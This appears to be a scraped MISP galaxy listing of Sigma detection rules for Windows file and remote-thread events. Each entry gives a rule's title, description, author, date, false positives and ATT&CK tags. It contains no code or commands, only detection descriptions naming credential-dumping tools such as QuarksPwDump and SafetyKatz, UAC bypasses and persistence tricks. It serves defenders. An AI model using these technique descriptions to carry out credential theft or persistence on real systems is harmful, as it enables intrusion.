author Florian Roth (Nextron Systems)
creation_date 2022-03-16
falsepositive ['Unknown']
filename create_remote_thread_win_susp_uncommon_target_image.yml
level medium
logsource.category create_remote_thread
logsource.product windows
tags ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1055.003']
Related clusters

To see the related clusters, click here.

Rare Remote Thread Creation By Uncommon Source Image

Detects uncommon processes creating remote threads.

Internal MISP references

UUID 02d1d718-dd13-41af-989d-ea85c7fab93f which can be used as unique global reference for Rare Remote Thread Creation By Uncommon Source Image in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Perez Diego (@darkquassar), oscd.community
creation_date 2019-10-27
falsepositive ['This rule is best put in testing first in order to create a baseline that reflects the data in your environment.']
filename create_remote_thread_win_susp_relevant_source_image.yml
level high
logsource.category create_remote_thread
logsource.product windows
tags ['attack.privilege-escalation', 'attack.defense-evasion', 'attack.t1055']
Related clusters

To see the related clusters, click here.

Suspicious Deno File Written from Remote Source

Detects Deno writing a file from a direct HTTP(s) call and writing to the appdata folder or bringing it's own malicious DLL. This behavior may indicate an attempt to execute remotely hosted, potentially malicious files through deno.

Internal MISP references

UUID 6c0ce3b6-85e2-49d4-9c3f-6e008ce9796e which can be used as unique global reference for Suspicious Deno File Written from Remote Source in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Josh Nickels, Michael Taggart
creation_date 2025-05-22
falsepositive ['Legitimate usage of deno to request a file or bring a DLL to a host']
filename file_event_win_creation_deno.yml
level low
logsource.category file_event
logsource.product windows
tags ['attack.execution', 'attack.t1204', 'attack.t1059.007', 'attack.command-and-control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

HackTool - QuarksPwDump Dump File

Detects a dump file written by QuarksPwDump password dumper

Internal MISP references

UUID 847def9e-924d-4e90-b7c4-5f581395a2b4 which can be used as unique global reference for HackTool - QuarksPwDump Dump File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2018-02-10
falsepositive ['Unknown']
filename file_event_win_hktl_quarkspw_filedump.yml
level critical
logsource.category file_event
logsource.product windows
tags ['attack.credential-access', 'attack.t1003.002']
Related clusters

To see the related clusters, click here.

LiveKD Driver Creation By Uncommon Process

Detects the creation of the LiveKD driver by a process image other than "livekd.exe".

Internal MISP references

UUID 059c5af9-5131-4d8d-92b2-de4ad6146712 which can be used as unique global reference for LiveKD Driver Creation By Uncommon Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-05-16
falsepositive ['Administrators might rename LiveKD before its usage which could trigger this. Add additional names you use to the filter']
filename file_event_win_sysinternals_livekd_driver_susp_creation.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense-evasion', 'attack.privilege-escalation']

New Outlook Macro Created

Detects the creation of a macro file for Outlook.

Internal MISP references

UUID 8c31f563-f9a7-450c-bfa8-35f8f32f1f61 which can be used as unique global reference for New Outlook Macro Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @ScoubiMtl
creation_date 2021-04-05
falsepositive ['User genuinely creates a VB Macro for their email']
filename file_event_win_office_outlook_macro_creation.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.command-and-control', 'attack.t1137', 'attack.t1008', 'attack.t1546']
Related clusters

To see the related clusters, click here.

Suspicious Executable File Creation

Detect creation of suspicious executable file names. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.

Internal MISP references

UUID 74babdd6-a758-4549-9632-26535279e654 which can be used as unique global reference for Suspicious Executable File Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-09-05
falsepositive ['Unknown']
filename file_event_win_susp_executable_creation.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1564']
Related clusters

To see the related clusters, click here.

Office Macro File Creation From Suspicious Process

Detects the creation of a office macro file from a a suspicious process

Internal MISP references

UUID b1c50487-1967-4315-a026-6491686d860e which can be used as unique global reference for Office Macro File Creation From Suspicious Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-01-23
falsepositive ['Unknown']
filename file_event_win_office_macro_files_from_susp_process.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.initial-access', 'attack.t1566.001']
Related clusters

To see the related clusters, click here.

File Creation In Suspicious Directory By Msdt.EXE

Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities

Internal MISP references

UUID 318557a5-150c-4c8d-b70e-a9910e199857 which can be used as unique global reference for File Creation In Suspicious Directory By Msdt.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Vadim Varganov, Florian Roth (Nextron Systems)
creation_date 2022-08-24
falsepositive ['Unknown']
filename file_event_win_msdt_susp_directories.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.001', 'cve.2022-30190']
Related clusters

To see the related clusters, click here.

Potentially Suspicious DMP/HDMP File Creation

Detects the creation of a file with the ".dmp"/".hdmp" extension by a shell or scripting application such as "cmd", "powershell", etc. Often created by software during a crash. Memory dumps can sometimes contain sensitive information such as credentials. It's best to determine the source of the crash.

Internal MISP references

UUID aba15bdd-657f-422a-bab3-ac2d2a0d6f1c which can be used as unique global reference for Potentially Suspicious DMP/HDMP File Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-09-07
falsepositive ['Some administrative PowerShell or VB scripts might have the ability to collect dumps and move them to other folders which might trigger a false positive.']
filename file_event_win_dump_file_susp_creation.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.defense-evasion']

UAC Bypass Using IDiagnostic Profile - File

Detects the creation of a file by "dllhost.exe" in System32 directory part of "IDiagnosticProfileUAC" UAC bypass technique

Internal MISP references

UUID 48ea844d-19b1-4642-944e-fe39c2cc1fec which can be used as unique global reference for UAC Bypass Using IDiagnostic Profile - File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-07-03
falsepositive ['Unknown']
filename file_event_win_uac_bypass_idiagnostic_profile.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.execution', 'attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Assembly DLL Creation Via AspNetCompiler

Detects the creation of new DLL assembly files by "aspnet_compiler.exe", which could be a sign of "aspnet_compiler" abuse to proxy execution through a build provider.

Internal MISP references

UUID 4c7f49ee-2638-43bb-b85b-ce676c30b260 which can be used as unique global reference for Assembly DLL Creation Via AspNetCompiler in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-08-14
falsepositive ['Legitimate assembly compilation using a build provider']
filename file_event_win_aspnet_temp_files.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.execution']

AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File

Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)

Internal MISP references

UUID d353dac0-1b41-46c2-820c-d7d2561fc6ed which can be used as unique global reference for AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Julia Fomina, oscd.community
creation_date 2020-10-06
falsepositive ['Unlikely']
filename file_event_win_winrm_awl_bypass.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1216']
Related clusters

To see the related clusters, click here.

Suspicious Desktopimgdownldr Target File

Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension

Internal MISP references

UUID fc4f4817-0c53-4683-a4ee-b17a64bc1039 which can be used as unique global reference for Suspicious Desktopimgdownldr Target File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2020-07-03
falsepositive ['False positives depend on scripts and administrative tools used in the monitored environment']
filename file_event_win_susp_desktopimgdownldr_file.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.command-and-control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Installation of TeamViewer Desktop

TeamViewer_Desktop.exe is create during install

Internal MISP references

UUID 9711de76-5d4f-4c50-a94f-21e4e8f8384d which can be used as unique global reference for Installation of TeamViewer Desktop in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-01-28
falsepositive ['Unknown']
filename file_event_win_install_teamviewer_desktop.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.command-and-control', 'attack.t1219.002']
Related clusters

To see the related clusters, click here.

HackTool - SafetyKatz Dump Indicator

Detects default lsass dump filename generated by SafetyKatz.

Internal MISP references

UUID e074832a-eada-4fd7-94a1-10642b130e16 which can be used as unique global reference for HackTool - SafetyKatz Dump Indicator in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis
creation_date 2018-07-24
falsepositive ['Rare legitimate files with similar filename structure']
filename file_event_win_hktl_safetykatz.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.credential-access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

.RDP File Created By Uncommon Application

Detects creation of a file with an ".rdp" extension by an application that doesn't commonly create such files.

Internal MISP references

UUID fccfb43e-09a7-4bd2-8b37-a5a7df33386d which can be used as unique global reference for .RDP File Created By Uncommon Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-04-18
falsepositive ['Unknown']
filename file_event_win_rdp_file_susp_creation.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense-evasion']

UAC Bypass Using Windows Media Player - File

Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)

Internal MISP references

UUID 68578b43-65df-4f81-9a9b-92f32711a951 which can be used as unique global reference for UAC Bypass Using Windows Media Player - File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021-08-23
falsepositive ['Unknown']
filename file_event_win_uac_bypass_wmp.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Suspicious Interactive PowerShell as SYSTEM

Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context

Internal MISP references

UUID 5b40a734-99b6-4b98-a1d0-1cea51a08ab2 which can be used as unique global reference for Suspicious Interactive PowerShell as SYSTEM in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021-12-07
falsepositive ['Administrative activity', 'PowerShell scripts running as SYSTEM user']
filename file_event_win_susp_system_interactive_powershell.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Legitimate Application Dropped Archive

Detects programs on a Windows system that should not write an archive to disk

Internal MISP references

UUID 654fcc6d-840d-4844-9b07-2c3300e54a26 which can be used as unique global reference for Legitimate Application Dropped Archive in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Florian Roth
creation_date 2022-08-21
falsepositive ['Unknown']
filename file_event_win_susp_legitimate_app_dropping_archive.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

PowerShell Module File Created

Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc.

Internal MISP references

UUID e36941d0-c0f0-443f-bc6f-cb2952eb69ea which can be used as unique global reference for PowerShell Module File Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-05-09
falsepositive ['Likely']
filename file_event_win_powershell_module_creation.yml
level low
logsource.category file_event
logsource.product windows
tags ['attack.persistence']

UAC Bypass Abusing Winsat Path Parsing - File

Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)

Internal MISP references

UUID 155dbf56-e0a4-4dd0-8905-8a98705045e8 which can be used as unique global reference for UAC Bypass Abusing Winsat Path Parsing - File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021-08-30
falsepositive ['Unknown']
filename file_event_win_uac_bypass_winsat.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Suspicious ASPX File Drop by Exchange

Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder

Internal MISP references

UUID bd1212e5-78da-431e-95fa-c58e3237a8e6 which can be used as unique global reference for Suspicious ASPX File Drop by Exchange in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), MSTI (query, idea)
creation_date 2022-10-01
falsepositive ['Unknown']
filename file_event_win_exchange_webshell_drop.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.t1505.003']
Related clusters

To see the related clusters, click here.

Self Extraction Directive File Created In Potentially Suspicious Location

Detects the creation of Self Extraction Directive files (.sed) in a potentially suspicious location. These files are used by the "iexpress.exe" utility in order to create self extracting packages. Attackers were seen abusing this utility and creating PE files with embedded ".sed" entries.

Internal MISP references

UUID 760e75d8-c3b5-409b-a9bf-6130b4c4603f which can be used as unique global reference for Self Extraction Directive File Created In Potentially Suspicious Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseliyo Sanchez, @Joseliyo_Jstnk
creation_date 2024-02-05
falsepositive ['Unknown']
filename file_event_win_sed_file_creation.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Suspicious PROCEXP152.sys File Created In TMP

Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder. This driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.

Internal MISP references

UUID 3da70954-0f2c-4103-adff-b7440368f50e which can be used as unique global reference for Suspicious PROCEXP152.sys File Created In TMP in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author xknow (@xknow_infosec), xorxes (@xor_xes)
creation_date 2019-04-08
falsepositive ["Other legimate tools using this driver and filename (like Sysinternals). Note - Clever attackers may easily bypass this detection by just renaming the driver filename. Therefore just Medium-level and don't rely on it."]
filename file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.t1562.001', 'attack.defense-evasion']
Related clusters

To see the related clusters, click here.

Suspicious Binary Writes Via AnyDesk

Detects AnyDesk writing binary files to disk other than "gcapi.dll". According to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll, which is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)

Internal MISP references

UUID 2d367498-5112-4ae5-a06a-96e7bc33a211 which can be used as unique global reference for Suspicious Binary Writes Via AnyDesk in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-09-28
falsepositive ['Unknown']
filename file_event_win_anydesk_writing_susp_binaries.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.command-and-control', 'attack.t1219.002']
Related clusters

To see the related clusters, click here.

Potential File Extension Spoofing Using Right-to-Left Override

Detects suspicious filenames that contain a right-to-left override character and a potentially spoofed file extensions.

Internal MISP references

UUID 979baf41-ca44-4540-9d0c-4fcef3b5a3a4 which can be used as unique global reference for Potential File Extension Spoofing Using Right-to-Left Override in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jonathan Peters (Nextron Systems), Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)
creation_date 2024-11-17
falsepositive ['Filenames that contains scriptures such as arabic or hebrew might make use of this character']
filename file_event_win_susp_right_to_left_override_extension_spoofing.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.execution', 'attack.defense-evasion', 'attack.t1036.002']
Related clusters

To see the related clusters, click here.

WinSxS Executable File Creation By Non-System Process

Detects the creation of binaries in the WinSxS folder by non-system processes

Internal MISP references

UUID 34746e8c-5fb8-415a-b135-0abc167e912a which can be used as unique global reference for WinSxS Executable File Creation By Non-System Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-05-11
falsepositive ['Unknown']
filename file_event_win_susp_winsxs_binary_creation.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.execution']

Suspicious File Creation In Uncommon AppData Folder

Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs

Internal MISP references

UUID d7b50671-d1ad-4871-aa60-5aa5b331fe04 which can be used as unique global reference for Suspicious File Creation In Uncommon AppData Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-08-05
falsepositive ['Unlikely']
filename file_event_win_new_files_in_uncommon_appdata_folder.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense-evasion', 'attack.execution']

DLL Search Order Hijackig Via Additional Space in Path

Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...) but with a space in order to trick DLL load search order and perform a "DLL Search Order Hijacking" attack

Internal MISP references

UUID b6f91281-20aa-446a-b986-38a92813a18f which can be used as unique global reference for DLL Search Order Hijackig Via Additional Space in Path in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-07-30
falsepositive ['Unknown']
filename file_event_win_dll_sideloading_space_path.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.privilege-escalation', 'attack.defense-evasion', 'attack.t1574.001']
Related clusters

To see the related clusters, click here.

Advanced IP Scanner - File Event

Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.

Internal MISP references

UUID fed85bf9-e075-4280-9159-fbe8a023d6fa which can be used as unique global reference for Advanced IP Scanner - File Event in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @ROxPinTeddy
creation_date 2020-05-12
falsepositive ['Legitimate administrative use']
filename file_event_win_advanced_ip_scanner.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.discovery', 'attack.t1046']
Related clusters

To see the related clusters, click here.

VHD Image Download Via Browser

Detects creation of ".vhd"/".vhdx" files by browser processes. Malware can use mountable Virtual Hard Disk ".vhd" files to encapsulate payloads and evade security controls.

Internal MISP references

UUID 8468111a-ef07-4654-903b-b863a80bbc95 which can be used as unique global reference for VHD Image Download Via Browser in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'
creation_date 2021-10-25
falsepositive ['Legitimate downloads of ".vhd" files would also trigger this']
filename file_event_win_vhd_download_via_browsers.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.resource-development', 'attack.t1587.001']
Related clusters

To see the related clusters, click here.

LiveKD Kernel Memory Dump File Created

Detects the creation of a file that has the same name as the default LiveKD kernel memory dump.

Internal MISP references

UUID 814ddeca-3d31-4265-8e07-8cc54fb44903 which can be used as unique global reference for LiveKD Kernel Memory Dump File Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-05-16
falsepositive ['In rare occasions administrators might leverage LiveKD to perform live kernel debugging. This should not be allowed on production systems. Investigate and apply additional filters where necessary.']
filename file_event_win_sysinternals_livekd_default_dump_name.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense-evasion', 'attack.privilege-escalation']

Suspicious Screensaver Binary File Creation

Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension

Internal MISP references

UUID 97aa2e88-555c-450d-85a6-229bcd87efb8 which can be used as unique global reference for Suspicious Screensaver Binary File Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021-12-29
falsepositive ['Unknown']
filename file_event_win_creation_scr_binary_file.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1546.002']
Related clusters

To see the related clusters, click here.

Creation of a Diagcab

Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location)

Internal MISP references

UUID 3d0ed417-3d94-4963-a562-4a92c940656a which can be used as unique global reference for Creation of a Diagcab in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-06-08
falsepositive ['Legitimate microsoft diagcab']
filename file_event_win_susp_diagcab.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.resource-development']

GatherNetworkInfo.VBS Reconnaissance Script Output

Detects creation of files which are the results of executing the built-in reconnaissance script "C:\Windows\System32\gatherNetworkInfo.vbs".

Internal MISP references

UUID f92a6f1e-a512-4a15-9735-da09e78d7273 which can be used as unique global reference for GatherNetworkInfo.VBS Reconnaissance Script Output in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-02-08
falsepositive ['Unknown']
filename file_event_win_lolbin_gather_network_info_script_output.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.discovery']

RemCom Service File Creation

Detects default RemCom service filename which indicates RemCom service installation and execution

Internal MISP references

UUID 7eff1a7f-dd45-4c20-877a-f21e342a7611 which can be used as unique global reference for RemCom Service File Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-08-04
falsepositive ['Unknown']
filename file_event_win_remcom_service.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.execution', 'attack.t1569.002', 'attack.s0029']
Related clusters

To see the related clusters, click here.

Anydesk Temporary Artefact

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

Internal MISP references

UUID 0b9ad457-2554-44c1-82c2-d56a99c42377 which can be used as unique global reference for Anydesk Temporary Artefact in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-02-11
falsepositive ['Legitimate use']
filename file_event_win_anydesk_artefact.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.command-and-control', 'attack.t1219.002']
Related clusters

To see the related clusters, click here.

Suspicious Creation with Colorcpl

Once executed, colorcpl.exe will copy the arbitrary file to c:\windows\system32\spool\drivers\color\

Internal MISP references

UUID e15b518d-b4ce-4410-a9cd-501f23ce4a18 which can be used as unique global reference for Suspicious Creation with Colorcpl in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-01-21
falsepositive ['Unknown']
filename file_event_win_susp_colorcpl.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1564']
Related clusters

To see the related clusters, click here.

WinRAR Creating Files in Startup Locations

Detects WinRAR creating files in Windows startup locations, which may indicate an attempt to establish persistence by adding malicious files to the Startup folder. This kind of behaviour has been associated with exploitation of WinRAR path traversal vulnerability CVE-2025-6218 or CVE-2025-8088.

Internal MISP references

UUID 74a2b37d-fea4-41e0-9ac7-c9fbcf1f60cc which can be used as unique global reference for WinRAR Creating Files in Startup Locations in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Swachchhanda Shrawan Poudel (Nextron Systems)
creation_date 2025-07-16
falsepositive ['Unknown']
filename file_event_win_winrar_file_creation_in_startup_folder.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

HackTool - RemoteKrbRelay SMB Relay Secrets Dump Module Indicators

Detects the creation of file with specific names used by RemoteKrbRelay SMB Relay attack module.

Internal MISP references

UUID 3ab79e90-9fab-4cdf-a7b2-6522bc742adb which can be used as unique global reference for HackTool - RemoteKrbRelay SMB Relay Secrets Dump Module Indicators in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2024-06-27
falsepositive ['Unlikely']
filename file_event_win_hktl_krbrelay_remote_ioc.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.command-and-control', 'attack.t1219.002']
Related clusters

To see the related clusters, click here.

Process Monitor Driver Creation By Non-Sysinternals Binary

Detects creation of the Process Monitor driver by processes other than Process Monitor (procmon) itself.

Internal MISP references

UUID a05baa88-e922-4001-bc4d-8738135f27de which can be used as unique global reference for Process Monitor Driver Creation By Non-Sysinternals Binary in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-05-05
falsepositive ['Some false positives may occur with legitimate renamed process monitor binaries']
filename file_event_win_sysinternals_procmon_driver_susp_creation.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.privilege-escalation', 'attack.t1068']
Related clusters

To see the related clusters, click here.

Potential Persistence Via Microsoft Office Startup Folder

Detects creation of Microsoft Office files inside of one of the default startup folders in order to achieve persistence.

Internal MISP references

UUID 0e20c89d-2264-44ae-8238-aeeaba609ece which can be used as unique global reference for Potential Persistence Via Microsoft Office Startup Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Max Altgelt (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-06-02
falsepositive ['Loading a user environment from a backup or a domain controller', 'Synchronization of templates']
filename file_event_win_office_startup_persistence.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.t1137']
Related clusters

To see the related clusters, click here.

Process Explorer Driver Creation By Non-Sysinternals Binary

Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself. Hack tools or malware may use the Process Explorer driver to elevate privileges, drops it to disk for a few moments, runs a service using that driver and removes it afterwards.

Internal MISP references

UUID de46c52b-0bf8-4936-a327-aace94f94ac6 which can be used as unique global reference for Process Explorer Driver Creation By Non-Sysinternals Binary in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2023-05-05
falsepositive ['Some false positives may occur with legitimate renamed process explorer binaries']
filename file_event_win_sysinternals_procexp_driver_susp_creation.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.privilege-escalation', 'attack.t1068']
Related clusters

To see the related clusters, click here.

Creation of WerFault.exe/Wer.dll in Unusual Folder

Detects the creation of a file named "WerFault.exe" or "wer.dll" in an uncommon folder, which could be a sign of WerFault DLL hijacking.

Internal MISP references

UUID 28a452f3-786c-4fd8-b8f2-bddbe9d616d1 which can be used as unique global reference for Creation of WerFault.exe/Wer.dll in Unusual Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-05-09
falsepositive ['Unknown']
filename file_event_win_werfault_dll_hijacking.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.defense-evasion', 'attack.t1574.001']
Related clusters

To see the related clusters, click here.

WMI Persistence - Script Event Consumer File Write

Detects file writes of WMI script event consumer

Internal MISP references

UUID 33f41cdd-35ac-4ba8-814b-c6a4244a1ad4 which can be used as unique global reference for WMI Persistence - Script Event Consumer File Write in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thomas Patzke
creation_date 2018-03-07
falsepositive ['Dell Power Manager (C:\Program Files\Dell\PowerManager\DpmPowerPlanSetup.exe)']
filename file_event_win_wmi_persistence_script_event_consumer_write.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.privilege-escalation', 'attack.t1546.003', 'attack.persistence']
Related clusters

To see the related clusters, click here.

Suspicious Startup Folder Persistence

Detects the creation of potentially malicious script and executable files in Windows startup folders, which is a common persistence technique used by threat actors. These files (.ps1, .vbs, .js, .bat, etc.) are automatically executed when a user logs in, making the Startup folder an attractive target for attackers. This technique is frequently observed in malvertising campaigns and malware distribution where attackers attempt to maintain long-term access to compromised systems.

Internal MISP references

UUID 28208707-fe31-437f-9a7f-4b1108b94d2e which can be used as unique global reference for Suspicious Startup Folder Persistence in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)
creation_date 2022-08-10
falsepositive ['Rare legitimate usage of some of the extensions mentioned in the rule']
filename file_event_win_susp_startup_folder_persistence.yml
level high
logsource.category file_event
logsource.product windows
